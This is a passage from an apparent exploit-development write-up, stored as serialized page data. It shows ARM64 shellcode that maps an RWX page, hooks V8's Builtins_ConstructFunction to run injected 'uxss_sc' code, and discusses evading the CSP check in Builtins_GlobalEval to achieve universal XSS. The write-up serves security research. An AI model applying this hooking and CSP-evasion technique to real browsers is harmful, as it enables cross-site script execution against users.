#0\n",{"type":24,"tag":301,"props":146372,"children":146373},{"class":303,"line":3647},[146374],{"type":24,"tag":301,"props":146375,"children":146376},{"emptyLinePlaceholder":16},[146377],{"type":30,"value":341},{"type":24,"tag":301,"props":146379,"children":146380},{"class":303,"line":3685},[146381],{"type":24,"tag":301,"props":146382,"children":146383},{},[146384],{"type":30,"value":146385},"mov x6, x5\n",{"type":24,"tag":301,"props":146387,"children":146388},{"class":303,"line":3713},[146389],{"type":24,"tag":301,"props":146390,"children":146391},{"emptyLinePlaceholder":16},[146392],{"type":30,"value":341},{"type":24,"tag":301,"props":146394,"children":146395},{"class":303,"line":3721},[146396],{"type":24,"tag":301,"props":146397,"children":146398},{},[146399],{"type":30,"value":146400},"// mmap RWX for jump dest (uxss_sc)\n",{"type":24,"tag":301,"props":146402,"children":146403},{"class":303,"line":3751},[146404],{"type":24,"tag":301,"props":146405,"children":146406},{},[146407],{"type":30,"value":146408},"mov x0, #0\n",{"type":24,"tag":301,"props":146410,"children":146411},{"class":303,"line":3782},[146412],{"type":24,"tag":301,"props":146413,"children":146414},{},[146415],{"type":30,"value":146416},"mov x1, #0x1000\n",{"type":24,"tag":301,"props":146418,"children":146419},{"class":303,"line":3791},[146420],{"type":24,"tag":301,"props":146421,"children":146422},{},[146423],{"type":30,"value":146354},{"type":24,"tag":301,"props":146425,"children":146426},{"class":303,"line":3819},[146427],{"type":24,"tag":301,"props":146428,"children":146429},{},[146430],{"type":30,"value":146431},"mov x3, #34\n",{"type":24,"tag":301,"props":146433,"children":146434},{"class":303,"line":4397},[146435],{"type":24,"tag":301,"props":146436,"children":146437},{},[146438],{"type":30,"value":146439},"mov x4, #-1\n",{"type":24,"tag":301,"props":146441,"children":146442},{"class":303,"line":4405},[146443],{"type":24,"tag":301,"props":146444,"children":146445},{},[146446],{"type":30,"value":146447},"mov x5, #0\n",{"type":24,"tag":301,"props":146449,"children":146450},{"class":303,"line":4422},[146451],{"type":24,"tag":301,"props":146452,"children":146453},{},[146454],{"type":30,"value":146455},"mov x8, #222\n",{"type":24,"tag":301,"props":146457,"children":146458},{"class":303,"line":4438},[146459],{"type":24,"tag":301,"props":146460,"children":146461},{},[146462],{"type":30,"value":146370},{"type":24,"tag":301,"props":146464,"children":146465},{"class":303,"line":4446},[146466],{"type":24,"tag":301,"props":146467,"children":146468},{"emptyLinePlaceholder":16},[146469],{"type":30,"value":341},{"type":24,"tag":301,"props":146471,"children":146472},{"class":303,"line":4506},[146473],{"type":24,"tag":301,"props":146474,"children":146475},{},[146476],{"type":30,"value":146268},{"type":24,"tag":301,"props":146478,"children":146479},{"class":303,"line":4566},[146480],{"type":24,"tag":301,"props":146481,"children":146482},{"emptyLinePlaceholder":16},[146483],{"type":30,"value":341},{"type":24,"tag":301,"props":146485,"children":146486},{"class":303,"line":4574},[146487],{"type":24,"tag":301,"props":146488,"children":146489},{},[146490],{"type":30,"value":146491},"// at this point:\n",{"type":24,"tag":301,"props":146493,"children":146494},{"class":303,"line":4590},[146495],{"type":24,"tag":301,"props":146496,"children":146497},{},[146498],{"type":30,"value":146499},"// x6 = Builtins_ConstructFunction\n",{"type":24,"tag":301,"props":146501,"children":146502},{"class":303,"line":4599},[146503],{"type":24,"tag":301,"props":146504,"children":146505},{},[146506],{"type":30,"value":146507},"// x5 = mmap page for uxss_sc\n",{"type":24,"tag":301,"props":146509,"children":146510},{"class":303,"line":4629},[146511],{"type":24,"tag":301,"props":146512,"children":146513},{"emptyLinePlaceholder":16},[146514],{"type":30,"value":341},{"type":24,"tag":301,"props":146516,"children":146517},{"class":303,"line":4659},[146518],{"type":24,"tag":301,"props":146519,"children":146520},{},[146521],{"type":30,"value":146522},"// write uxss_sc to mmaped rwx page\n",{"type":24,"tag":301,"props":146524,"children":146525},{"class":303,"line":4668},[146526],{"type":24,"tag":301,"props":146527,"children":146528},{},[146529],{"type":30,"value":146530},"{write_sc(uxss_sc, \"x5\")}\n",{"type":24,"tag":301,"props":146532,"children":146533},{"class":303,"line":4677},[146534],{"type":24,"tag":301,"props":146535,"children":146536},{"emptyLinePlaceholder":16},[146537],{"type":30,"value":341},{"type":24,"tag":301,"props":146539,"children":146540},{"class":303,"line":4697},[146541],{"type":24,"tag":301,"props":146542,"children":146543},{},[146544],{"type":30,"value":146545},"// wipe from cache\n",{"type":24,"tag":301,"props":146547,"children":146548},{"class":303,"line":4725},[146549],{"type":24,"tag":301,"props":146550,"children":146551},{},[146552],{"type":30,"value":146553},"mov x0, x5\n",{"type":24,"tag":301,"props":146555,"children":146556},{"class":303,"line":4733},[146557],{"type":24,"tag":301,"props":146558,"children":146559},{},[146560],{"type":30,"value":146561},"{WIPE_CACHE}\n",{"type":24,"tag":301,"props":146563,"children":146564},{"class":303,"line":4741},[146565],{"type":24,"tag":301,"props":146566,"children":146567},{"emptyLinePlaceholder":16},[146568],{"type":30,"value":341},{"type":24,"tag":301,"props":146570,"children":146571},{"class":303,"line":4757},[146572],{"type":24,"tag":301,"props":146573,"children":146574},{},[146575],{"type":30,"value":146576},"// patch Builtins_ConstructFunction\n",{"type":24,"tag":301,"props":146578,"children":146579},{"class":303,"line":4765},[146580],{"type":24,"tag":301,"props":146581,"children":146582},{},[146583],{"type":30,"value":146584},"{write_sc(new_compile_instrs, \"x6\")}\n",{"type":24,"tag":301,"props":146586,"children":146587},{"class":303,"line":4773},[146588],{"type":24,"tag":301,"props":146589,"children":146590},{},[146591],{"type":30,"value":146592},"// and add a pointer to uxss_sc just above new instructions\n",{"type":24,"tag":301,"props":146594,"children":146595},{"class":303,"line":4781},[146596],{"type":24,"tag":301,"props":146597,"children":146598},{},[146599],{"type":30,"value":146600},"str x5, [x6, #{5 * INSTR_SIZE}]\n",{"type":24,"tag":301,"props":146602,"children":146603},{"class":303,"line":4789},[146604],{"type":24,"tag":301,"props":146605,"children":146606},{"emptyLinePlaceholder":16},[146607],{"type":30,"value":341},{"type":24,"tag":301,"props":146609,"children":146610},{"class":303,"line":4848},[146611],{"type":24,"tag":301,"props":146612,"children":146613},{},[146614],{"type":30,"value":146545},{"type":24,"tag":301,"props":146616,"children":146617},{"class":303,"line":4862},[146618],{"type":24,"tag":301,"props":146619,"children":146620},{},[146621],{"type":30,"value":146622},"mov x0, x6\n",{"type":24,"tag":301,"props":146624,"children":146625},{"class":303,"line":4871},[146626],{"type":24,"tag":301,"props":146627,"children":146628},{},[146629],{"type":30,"value":146561},{"type":24,"tag":32,"props":146631,"children":146632},{},[146633,146635,146641,146643,146648,146650,146656],{"type":30,"value":146634},"In the snippet above, ",{"type":24,"tag":145,"props":146636,"children":146638},{"className":146637},[],[146639],{"type":30,"value":146640},"new_compile_instrs",{"type":30,"value":146642}," refers to the instructions written to the beginning of ",{"type":24,"tag":145,"props":146644,"children":146646},{"className":146645},[],[146647],{"type":30,"value":146139},{"type":30,"value":146649}," that invoke the ",{"type":24,"tag":145,"props":146651,"children":146653},{"className":146652},[],[146654],{"type":30,"value":146655},"uxss_sc",{"type":30,"value":146657}," mmap-ed shellcode:",{"type":24,"tag":291,"props":146659,"children":146661},{"code":146660,"language":146192,"meta":7,"className":146193,"style":7},"bti c\n\n// store registers that will be overwritten\nstp x15, lr, [sp, #-16]!\n\n// get current rip into x15\nadr x15, .\n\n// load the uxss_sc pointer saved just above new instructions\nldr x15, [x15, #{3 * INSTR_SIZE}]\n\n// jump to uxss_sc\nblr x15\n",[146662],{"type":24,"tag":145,"props":146663,"children":146664},{"__ignoreMap":7},[146665,146673,146680,146688,146696,146703,146711,146719,146726,146734,146742,146749,146757],{"type":24,"tag":301,"props":146666,"children":146667},{"class":303,"line":304},[146668],{"type":24,"tag":301,"props":146669,"children":146670},{},[146671],{"type":30,"value":146672},"bti c\n",{"type":24,"tag":301,"props":146674,"children":146675},{"class":303,"line":320},[146676],{"type":24,"tag":301,"props":146677,"children":146678},{"emptyLinePlaceholder":16},[146679],{"type":30,"value":341},{"type":24,"tag":301,"props":146681,"children":146682},{"class":303,"line":335},[146683],{"type":24,"tag":301,"props":146684,"children":146685},{},[146686],{"type":30,"value":146687},"// store registers that will be overwritten\n",{"type":24,"tag":301,"props":146689,"children":146690},{"class":303,"line":344},[146691],{"type":24,"tag":301,"props":146692,"children":146693},{},[146694],{"type":30,"value":146695},"stp x15, lr, [sp, #-16]!\n",{"type":24,"tag":301,"props":146697,"children":146698},{"class":303,"line":401},[146699],{"type":24,"tag":301,"props":146700,"children":146701},{"emptyLinePlaceholder":16},[146702],{"type":30,"value":341},{"type":24,"tag":301,"props":146704,"children":146705},{"class":303,"line":415},[146706],{"type":24,"tag":301,"props":146707,"children":146708},{},[146709],{"type":30,"value":146710},"// get current rip into x15\n",{"type":24,"tag":301,"props":146712,"children":146713},{"class":303,"line":439},[146714],{"type":24,"tag":301,"props":146715,"children":146716},{},[146717],{"type":30,"value":146718},"adr x15, .\n",{"type":24,"tag":301,"props":146720,"children":146721},{"class":303,"line":447},[146722],{"type":24,"tag":301,"props":146723,"children":146724},{"emptyLinePlaceholder":16},[146725],{"type":30,"value":341},{"type":24,"tag":301,"props":146727,"children":146728},{"class":303,"line":476},[146729],{"type":24,"tag":301,"props":146730,"children":146731},{},[146732],{"type":30,"value":146733},"// load the uxss_sc pointer saved just above new instructions\n",{"type":24,"tag":301,"props":146735,"children":146736},{"class":303,"line":495},[146737],{"type":24,"tag":301,"props":146738,"children":146739},{},[146740],{"type":30,"value":146741},"ldr x15, [x15, #{3 * INSTR_SIZE}]\n",{"type":24,"tag":301,"props":146743,"children":146744},{"class":303,"line":504},[146745],{"type":24,"tag":301,"props":146746,"children":146747},{"emptyLinePlaceholder":16},[146748],{"type":30,"value":341},{"type":24,"tag":301,"props":146750,"children":146751},{"class":303,"line":512},[146752],{"type":24,"tag":301,"props":146753,"children":146754},{},[146755],{"type":30,"value":146756},"// jump to uxss_sc\n",{"type":24,"tag":301,"props":146758,"children":146759},{"class":303,"line":592},[146760],{"type":24,"tag":301,"props":146761,"children":146762},{},[146763],{"type":30,"value":146764},"blr x15\n",{"type":24,"tag":32,"props":146766,"children":146767},{},[146768,146773,146775,146780],{"type":24,"tag":145,"props":146769,"children":146771},{"className":146770},[],[146772],{"type":30,"value":146655},{"type":30,"value":146774}," is the mmap-ed shellcode invoked by the patched ",{"type":24,"tag":145,"props":146776,"children":146778},{"className":146777},[],[146779],{"type":30,"value":146139},{"type":30,"value":146781}," to execute our XSS payload. Its prologue looks like this:",{"type":24,"tag":291,"props":146783,"children":146785},{"code":146784,"language":146192,"meta":7,"className":146193,"style":7},"bti c\n\n// Save full register context\nstp x0, x1, [sp, #-16]!\nstp x2, x3, [sp, #-16]!\nstp x4, x5, [sp, #-16]!\nstp x6, x7, [sp, #-16]!\nstp x8, x9, [sp, #-16]!\nstp x10, x11, [sp, #-16]!\nstp x12, x13, [sp, #-16]!\nstp x14, x15, [sp, #-16]!\nstp x16, x17, [sp, #-16]!\nstp x18, x19, [sp, #-16]!\nstp x20, x21, [sp, #-16]!\nstp x22, x23, [sp, #-16]!\nstp x24, x25, [sp, #-16]!\nstp x26, x27, [sp, #-16]!\nstp x28, x29, [sp, #-16]!\nstr lr, [sp, #-16]!\n",[146786],{"type":24,"tag":145,"props":146787,"children":146788},{"__ignoreMap":7},[146789,146796,146803,146811,146819,146827,146835,146843,146851,146859,146867,146875,146883,146891,146899,146907,146915,146923,146931],{"type":24,"tag":301,"props":146790,"children":146791},{"class":303,"line":304},[146792],{"type":24,"tag":301,"props":146793,"children":146794},{},[146795],{"type":30,"value":146672},{"type":24,"tag":301,"props":146797,"children":146798},{"class":303,"line":320},[146799],{"type":24,"tag":301,"props":146800,"children":146801},{"emptyLinePlaceholder":16},[146802],{"type":30,"value":341},{"type":24,"tag":301,"props":146804,"children":146805},{"class":303,"line":335},[146806],{"type":24,"tag":301,"props":146807,"children":146808},{},[146809],{"type":30,"value":146810},"// Save full register context\n",{"type":24,"tag":301,"props":146812,"children":146813},{"class":303,"line":344},[146814],{"type":24,"tag":301,"props":146815,"children":146816},{},[146817],{"type":30,"value":146818},"stp x0, x1, [sp, #-16]!\n",{"type":24,"tag":301,"props":146820,"children":146821},{"class":303,"line":401},[146822],{"type":24,"tag":301,"props":146823,"children":146824},{},[146825],{"type":30,"value":146826},"stp x2, x3, [sp, #-16]!\n",{"type":24,"tag":301,"props":146828,"children":146829},{"class":303,"line":415},[146830],{"type":24,"tag":301,"props":146831,"children":146832},{},[146833],{"type":30,"value":146834},"stp x4, x5, [sp, #-16]!\n",{"type":24,"tag":301,"props":146836,"children":146837},{"class":303,"line":439},[146838],{"type":24,"tag":301,"props":146839,"children":146840},{},[146841],{"type":30,"value":146842},"stp x6, x7, [sp, #-16]!\n",{"type":24,"tag":301,"props":146844,"children":146845},{"class":303,"line":447},[146846],{"type":24,"tag":301,"props":146847,"children":146848},{},[146849],{"type":30,"value":146850},"stp x8, x9, [sp, #-16]!\n",{"type":24,"tag":301,"props":146852,"children":146853},{"class":303,"line":476},[146854],{"type":24,"tag":301,"props":146855,"children":146856},{},[146857],{"type":30,"value":146858},"stp x10, x11, [sp, #-16]!\n",{"type":24,"tag":301,"props":146860,"children":146861},{"class":303,"line":495},[146862],{"type":24,"tag":301,"props":146863,"children":146864},{},[146865],{"type":30,"value":146866},"stp x12, x13, [sp, #-16]!\n",{"type":24,"tag":301,"props":146868,"children":146869},{"class":303,"line":504},[146870],{"type":24,"tag":301,"props":146871,"children":146872},{},[146873],{"type":30,"value":146874},"stp x14, x15, [sp, #-16]!\n",{"type":24,"tag":301,"props":146876,"children":146877},{"class":303,"line":512},[146878],{"type":24,"tag":301,"props":146879,"children":146880},{},[146881],{"type":30,"value":146882},"stp x16, x17, [sp, #-16]!\n",{"type":24,"tag":301,"props":146884,"children":146885},{"class":303,"line":592},[146886],{"type":24,"tag":301,"props":146887,"children":146888},{},[146889],{"type":30,"value":146890},"stp x18, x19, [sp, #-16]!\n",{"type":24,"tag":301,"props":146892,"children":146893},{"class":303,"line":619},[146894],{"type":24,"tag":301,"props":146895,"children":146896},{},[146897],{"type":30,"value":146898},"stp x20, x21, [sp, #-16]!\n",{"type":24,"tag":301,"props":146900,"children":146901},{"class":303,"line":635},[146902],{"type":24,"tag":301,"props":146903,"children":146904},{},[146905],{"type":30,"value":146906},"stp x22, x23, [sp, #-16]!\n",{"type":24,"tag":301,"props":146908,"children":146909},{"class":303,"line":643},[146910],{"type":24,"tag":301,"props":146911,"children":146912},{},[146913],{"type":30,"value":146914},"stp x24, x25, [sp, #-16]!\n",{"type":24,"tag":301,"props":146916,"children":146917},{"class":303,"line":652},[146918],{"type":24,"tag":301,"props":146919,"children":146920},{},[146921],{"type":30,"value":146922},"stp x26, x27, [sp, #-16]!\n",{"type":24,"tag":301,"props":146924,"children":146925},{"class":303,"line":666},[146926],{"type":24,"tag":301,"props":146927,"children":146928},{},[146929],{"type":30,"value":146930},"stp x28, x29, [sp, #-16]!\n",{"type":24,"tag":301,"props":146932,"children":146933},{"class":303,"line":674},[146934],{"type":24,"tag":301,"props":146935,"children":146936},{},[146937],{"type":30,"value":146938},"str lr, [sp, #-16]!\n",{"type":24,"tag":32,"props":146940,"children":146941},{},[146942],{"type":30,"value":146943},"All registers are saved to the stack because we don't know which registers may be clobbered by functions invoked later.",{"type":24,"tag":32,"props":146945,"children":146946},{},[146947,146949,146954],{"type":30,"value":146948},"The epilogue restores all saved registers, restores the original instructions in ",{"type":24,"tag":145,"props":146950,"children":146952},{"className":146951},[],[146953],{"type":30,"value":146139},{"type":30,"value":146955},", and then returns execution to its beginning:",{"type":24,"tag":291,"props":146957,"children":146959},{"code":146958,"language":146192,"meta":7,"className":146193,"style":7},"// restore original instructions of Builtins_ConstructFunction\nldr lr, [sp], #16\n// move lr to the beginning of Builtins_ConstructFunction\nsub lr, lr, #{5 * INSTR_SIZE}\n{write_sc(orig_compile_instrs, \"lr\")}\n\n// wipe from cache\nmov x0, lr\n{WIPE_CACHE}\n\n// restore original registers\nldp x28, x29, [sp], #16\nldp x26, x27, [sp], #16\nldp x24, x25, [sp], #16\nldp x22, x23, [sp], #16\nldp x20, x21, [sp], #16\nldp x18, x19, [sp], #16\nldp x16, x17, [sp], #16\nldp x14, x15, [sp], #16\nldp x12, x13, [sp], #16\nldp x10, x11, [sp], #16\nldp x8, x9, [sp], #16\nldp x6, x7, [sp], #16\nldp x4, x5, [sp], #16\nldp x2, x3, [sp], #16\nldp x0, x1, [sp], #16\n\n// Builtins_ConstructFunction doesnt care about x4 and overwrites\n// it immediately, so we can clobber and use it as a return register.\n// This is done so lr isnt clobbered and ConstructFunction knows\n// where to return\nmov x4, lr\n\n// x15 and lr were saved in patched Builtins_ConstructFunction\nldp x15, lr, [sp], #16\n\nret x4\n",[146960],{"type":24,"tag":145,"props":146961,"children":146962},{"__ignoreMap":7},[146963,146971,146979,146987,146995,147003,147010,147017,147025,147032,147039,147047,147055,147063,147071,147079,147087,147095,147103,147111,147119,147127,147135,147143,147151,147159,147167,147174,147182,147190,147198,147206,147214,147221,147229,147237,147244],{"type":24,"tag":301,"props":146964,"children":146965},{"class":303,"line":304},[146966],{"type":24,"tag":301,"props":146967,"children":146968},{},[146969],{"type":30,"value":146970},"// restore original instructions of Builtins_ConstructFunction\n",{"type":24,"tag":301,"props":146972,"children":146973},{"class":303,"line":320},[146974],{"type":24,"tag":301,"props":146975,"children":146976},{},[146977],{"type":30,"value":146978},"ldr lr, [sp], #16\n",{"type":24,"tag":301,"props":146980,"children":146981},{"class":303,"line":335},[146982],{"type":24,"tag":301,"props":146983,"children":146984},{},[146985],{"type":30,"value":146986},"// move lr to the beginning of Builtins_ConstructFunction\n",{"type":24,"tag":301,"props":146988,"children":146989},{"class":303,"line":344},[146990],{"type":24,"tag":301,"props":146991,"children":146992},{},[146993],{"type":30,"value":146994},"sub lr, lr, #{5 * INSTR_SIZE}\n",{"type":24,"tag":301,"props":146996,"children":146997},{"class":303,"line":401},[146998],{"type":24,"tag":301,"props":146999,"children":147000},{},[147001],{"type":30,"value":147002},"{write_sc(orig_compile_instrs, \"lr\")}\n",{"type":24,"tag":301,"props":147004,"children":147005},{"class":303,"line":415},[147006],{"type":24,"tag":301,"props":147007,"children":147008},{"emptyLinePlaceholder":16},[147009],{"type":30,"value":341},{"type":24,"tag":301,"props":147011,"children":147012},{"class":303,"line":439},[147013],{"type":24,"tag":301,"props":147014,"children":147015},{},[147016],{"type":30,"value":146545},{"type":24,"tag":301,"props":147018,"children":147019},{"class":303,"line":447},[147020],{"type":24,"tag":301,"props":147021,"children":147022},{},[147023],{"type":30,"value":147024},"mov x0, lr\n",{"type":24,"tag":301,"props":147026,"children":147027},{"class":303,"line":476},[147028],{"type":24,"tag":301,"props":147029,"children":147030},{},[147031],{"type":30,"value":146561},{"type":24,"tag":301,"props":147033,"children":147034},{"class":303,"line":495},[147035],{"type":24,"tag":301,"props":147036,"children":147037},{"emptyLinePlaceholder":16},[147038],{"type":30,"value":341},{"type":24,"tag":301,"props":147040,"children":147041},{"class":303,"line":504},[147042],{"type":24,"tag":301,"props":147043,"children":147044},{},[147045],{"type":30,"value":147046},"// restore original registers\n",{"type":24,"tag":301,"props":147048,"children":147049},{"class":303,"line":512},[147050],{"type":24,"tag":301,"props":147051,"children":147052},{},[147053],{"type":30,"value":147054},"ldp x28, x29, [sp], #16\n",{"type":24,"tag":301,"props":147056,"children":147057},{"class":303,"line":592},[147058],{"type":24,"tag":301,"props":147059,"children":147060},{},[147061],{"type":30,"value":147062},"ldp x26, x27, [sp], #16\n",{"type":24,"tag":301,"props":147064,"children":147065},{"class":303,"line":619},[147066],{"type":24,"tag":301,"props":147067,"children":147068},{},[147069],{"type":30,"value":147070},"ldp x24, x25, [sp], #16\n",{"type":24,"tag":301,"props":147072,"children":147073},{"class":303,"line":635},[147074],{"type":24,"tag":301,"props":147075,"children":147076},{},[147077],{"type":30,"value":147078},"ldp x22, x23, [sp], #16\n",{"type":24,"tag":301,"props":147080,"children":147081},{"class":303,"line":643},[147082],{"type":24,"tag":301,"props":147083,"children":147084},{},[147085],{"type":30,"value":147086},"ldp x20, x21, [sp], #16\n",{"type":24,"tag":301,"props":147088,"children":147089},{"class":303,"line":652},[147090],{"type":24,"tag":301,"props":147091,"children":147092},{},[147093],{"type":30,"value":147094},"ldp x18, x19, [sp], #16\n",{"type":24,"tag":301,"props":147096,"children":147097},{"class":303,"line":666},[147098],{"type":24,"tag":301,"props":147099,"children":147100},{},[147101],{"type":30,"value":147102},"ldp x16, x17, [sp], #16\n",{"type":24,"tag":301,"props":147104,"children":147105},{"class":303,"line":674},[147106],{"type":24,"tag":301,"props":147107,"children":147108},{},[147109],{"type":30,"value":147110},"ldp x14, x15, [sp], #16\n",{"type":24,"tag":301,"props":147112,"children":147113},{"class":303,"line":692},[147114],{"type":24,"tag":301,"props":147115,"children":147116},{},[147117],{"type":30,"value":147118},"ldp x12, x13, [sp], #16\n",{"type":24,"tag":301,"props":147120,"children":147121},{"class":303,"line":3631},[147122],{"type":24,"tag":301,"props":147123,"children":147124},{},[147125],{"type":30,"value":147126},"ldp x10, x11, [sp], #16\n",{"type":24,"tag":301,"props":147128,"children":147129},{"class":303,"line":3639},[147130],{"type":24,"tag":301,"props":147131,"children":147132},{},[147133],{"type":30,"value":147134},"ldp x8, x9, [sp], #16\n",{"type":24,"tag":301,"props":147136,"children":147137},{"class":303,"line":3647},[147138],{"type":24,"tag":301,"props":147139,"children":147140},{},[147141],{"type":30,"value":147142},"ldp x6, x7, [sp], #16\n",{"type":24,"tag":301,"props":147144,"children":147145},{"class":303,"line":3685},[147146],{"type":24,"tag":301,"props":147147,"children":147148},{},[147149],{"type":30,"value":147150},"ldp x4, x5, [sp], #16\n",{"type":24,"tag":301,"props":147152,"children":147153},{"class":303,"line":3713},[147154],{"type":24,"tag":301,"props":147155,"children":147156},{},[147157],{"type":30,"value":147158},"ldp x2, x3, [sp], #16\n",{"type":24,"tag":301,"props":147160,"children":147161},{"class":303,"line":3721},[147162],{"type":24,"tag":301,"props":147163,"children":147164},{},[147165],{"type":30,"value":147166},"ldp x0, x1, [sp], #16\n",{"type":24,"tag":301,"props":147168,"children":147169},{"class":303,"line":3751},[147170],{"type":24,"tag":301,"props":147171,"children":147172},{"emptyLinePlaceholder":16},[147173],{"type":30,"value":341},{"type":24,"tag":301,"props":147175,"children":147176},{"class":303,"line":3782},[147177],{"type":24,"tag":301,"props":147178,"children":147179},{},[147180],{"type":30,"value":147181},"// Builtins_ConstructFunction doesnt care about x4 and overwrites\n",{"type":24,"tag":301,"props":147183,"children":147184},{"class":303,"line":3791},[147185],{"type":24,"tag":301,"props":147186,"children":147187},{},[147188],{"type":30,"value":147189},"// it immediately, so we can clobber and use it as a return register.\n",{"type":24,"tag":301,"props":147191,"children":147192},{"class":303,"line":3819},[147193],{"type":24,"tag":301,"props":147194,"children":147195},{},[147196],{"type":30,"value":147197},"// This is done so lr isnt clobbered and ConstructFunction knows\n",{"type":24,"tag":301,"props":147199,"children":147200},{"class":303,"line":4397},[147201],{"type":24,"tag":301,"props":147202,"children":147203},{},[147204],{"type":30,"value":147205},"// where to return\n",{"type":24,"tag":301,"props":147207,"children":147208},{"class":303,"line":4405},[147209],{"type":24,"tag":301,"props":147210,"children":147211},{},[147212],{"type":30,"value":147213},"mov x4, lr\n",{"type":24,"tag":301,"props":147215,"children":147216},{"class":303,"line":4422},[147217],{"type":24,"tag":301,"props":147218,"children":147219},{"emptyLinePlaceholder":16},[147220],{"type":30,"value":341},{"type":24,"tag":301,"props":147222,"children":147223},{"class":303,"line":4438},[147224],{"type":24,"tag":301,"props":147225,"children":147226},{},[147227],{"type":30,"value":147228},"// x15 and lr were saved in patched Builtins_ConstructFunction\n",{"type":24,"tag":301,"props":147230,"children":147231},{"class":303,"line":4446},[147232],{"type":24,"tag":301,"props":147233,"children":147234},{},[147235],{"type":30,"value":147236},"ldp x15, lr, [sp], #16\n",{"type":24,"tag":301,"props":147238,"children":147239},{"class":303,"line":4506},[147240],{"type":24,"tag":301,"props":147241,"children":147242},{"emptyLinePlaceholder":16},[147243],{"type":30,"value":341},{"type":24,"tag":301,"props":147245,"children":147246},{"class":303,"line":4566},[147247],{"type":24,"tag":301,"props":147248,"children":147249},{},[147250],{"type":30,"value":147251},"ret x4\n",{"type":24,"tag":32,"props":147253,"children":147254},{},[147255,147257,147262,147264,147269,147271,147277],{"type":30,"value":147256},"At this point, we have successfully hooked ",{"type":24,"tag":145,"props":147258,"children":147260},{"className":147259},[],[147261],{"type":30,"value":146139},{"type":30,"value":147263}," and can execute arbitrary shellcode whenever it is invoked from within the ",{"type":24,"tag":145,"props":147265,"children":147267},{"className":147266},[],[147268],{"type":30,"value":146655},{"type":30,"value":147270}," body. For our purposes, we want to evaluate an arbitrary JavaScript string to achieve UXSS, and the first function we examined for this was ",{"type":24,"tag":145,"props":147272,"children":147274},{"className":147273},[],[147275],{"type":30,"value":147276},"Builtins_GlobalEval",{"type":30,"value":206},{"type":24,"tag":32,"props":147279,"children":147280},{},[147281,147286,147288,147293,147295,147300],{"type":24,"tag":145,"props":147282,"children":147284},{"className":147283},[],[147285],{"type":30,"value":147276},{"type":30,"value":147287}," takes a single ",{"type":24,"tag":145,"props":147289,"children":147291},{"className":147290},[],[147292],{"type":30,"value":54662},{"type":30,"value":147294}," argument that it evaluates. However, it comes with some complications. One notable issue is that it checks whether the Content Security Policy (CSP) allows the use of ",{"type":24,"tag":145,"props":147296,"children":147298},{"className":147297},[],[147299],{"type":30,"value":44287},{"type":30,"value":1679},{"type":24,"tag":291,"props":147302,"children":147304},{"code":147303,"language":35868,"meta":7,"className":35866,"style":7},"BUILTIN(GlobalEval) {\n [...]\n\n if (!Builtins::AllowDynamicFunction(isolate, target, target_global_proxy)) {\n isolate->CountUsage(v8::Isolate::kFunctionConstructorReturnedUndefined);\n return ReadOnlyRoots(isolate).undefined_value();\n }\n",[147305],{"type":24,"tag":145,"props":147306,"children":147307},{"__ignoreMap":7},[147308,147321,147328,147335,147378,147400,147426],{"type":24,"tag":301,"props":147309,"children":147310},{"class":303,"line":304},[147311,147316],{"type":24,"tag":301,"props":147312,"children":147313},{"style":314},[147314],{"type":30,"value":147315},"BUILTIN",{"type":24,"tag":301,"props":147317,"children":147318},{"style":359},[147319],{"type":30,"value":147320},"(GlobalEval) {\n",{"type":24,"tag":301,"props":147322,"children":147323},{"class":303,"line":320},[147324],{"type":24,"tag":301,"props":147325,"children":147326},{"style":359},[147327],{"type":30,"value":133836},{"type":24,"tag":301,"props":147329,"children":147330},{"class":303,"line":335},[147331],{"type":24,"tag":301,"props":147332,"children":147333},{"emptyLinePlaceholder":16},[147334],{"type":30,"value":341},{"type":24,"tag":301,"props":147336,"children":147337},{"class":303,"line":344},[147338,147343,147348,147352,147357,147361,147365,147369,147374],{"type":24,"tag":301,"props":147339,"children":147340},{"style":359},[147341],{"type":30,"value":147342}," if (!Builtins::",{"type":24,"tag":301,"props":147344,"children":147345},{"style":10246},[147346],{"type":30,"value":147347},"AllowDynamicFunction",{"type":24,"tag":301,"props":147349,"children":147350},{"style":359},[147351],{"type":30,"value":362},{"type":24,"tag":301,"props":147353,"children":147354},{"style":10246},[147355],{"type":30,"value":147356},"isolate",{"type":24,"tag":301,"props":147358,"children":147359},{"style":359},[147360],{"type":30,"value":377},{"type":24,"tag":301,"props":147362,"children":147363},{"style":10246},[147364],{"type":30,"value":121770},{"type":24,"tag":301,"props":147366,"children":147367},{"style":359},[147368],{"type":30,"value":377},{"type":24,"tag":301,"props":147370,"children":147371},{"style":10246},[147372],{"type":30,"value":147373},"target_global_proxy",{"type":24,"tag":301,"props":147375,"children":147376},{"style":359},[147377],{"type":30,"value":41941},{"type":24,"tag":301,"props":147379,"children":147380},{"class":303,"line":401},[147381,147386,147390,147395],{"type":24,"tag":301,"props":147382,"children":147383},{"style":369},[147384],{"type":30,"value":147385}," isolate",{"type":24,"tag":301,"props":147387,"children":147388},{"style":359},[147389],{"type":30,"value":882},{"type":24,"tag":301,"props":147391,"children":147392},{"style":314},[147393],{"type":30,"value":147394},"CountUsage",{"type":24,"tag":301,"props":147396,"children":147397},{"style":359},[147398],{"type":30,"value":147399},"(v8::Isolate::kFunctionConstructorReturnedUndefined);\n",{"type":24,"tag":301,"props":147401,"children":147402},{"class":303,"line":415},[147403,147407,147412,147417,147422],{"type":24,"tag":301,"props":147404,"children":147405},{"style":308},[147406],{"type":30,"value":680},{"type":24,"tag":301,"props":147408,"children":147409},{"style":314},[147410],{"type":30,"value":147411}," ReadOnlyRoots",{"type":24,"tag":301,"props":147413,"children":147414},{"style":359},[147415],{"type":30,"value":147416},"(isolate).",{"type":24,"tag":301,"props":147418,"children":147419},{"style":314},[147420],{"type":30,"value":147421},"undefined_value",{"type":24,"tag":301,"props":147423,"children":147424},{"style":359},[147425],{"type":30,"value":4859},{"type":24,"tag":301,"props":147427,"children":147428},{"class":303,"line":439},[147429],{"type":24,"tag":301,"props":147430,"children":147431},{"style":359},[147432],{"type":30,"value":6918},{"type":24,"tag":32,"props":147434,"children":147435},{},[147436,147438,147443],{"type":30,"value":147437},"This means we would need to patch the function further to ensure it never enters this ",{"type":24,"tag":145,"props":147439,"children":147441},{"className":147440},[],[147442],{"type":30,"value":22368},{"type":30,"value":147444}," block.",{"type":24,"tag":32,"props":147446,"children":147447},{},[147448],{"type":30,"value":147449},"Alternatively, we could replicate the calls made once the security checks pass:",{"type":24,"tag":291,"props":147451,"children":147453},{"code":147452,"language":35868,"meta":7,"className":35866,"style":7},"BUILTIN(GlobalEval) {\n\n [...]\n\n DirectHandle\u003CJSFunction> function;\n ASSIGN_RETURN_FAILURE_ON_EXCEPTION(\n isolate, function,\n 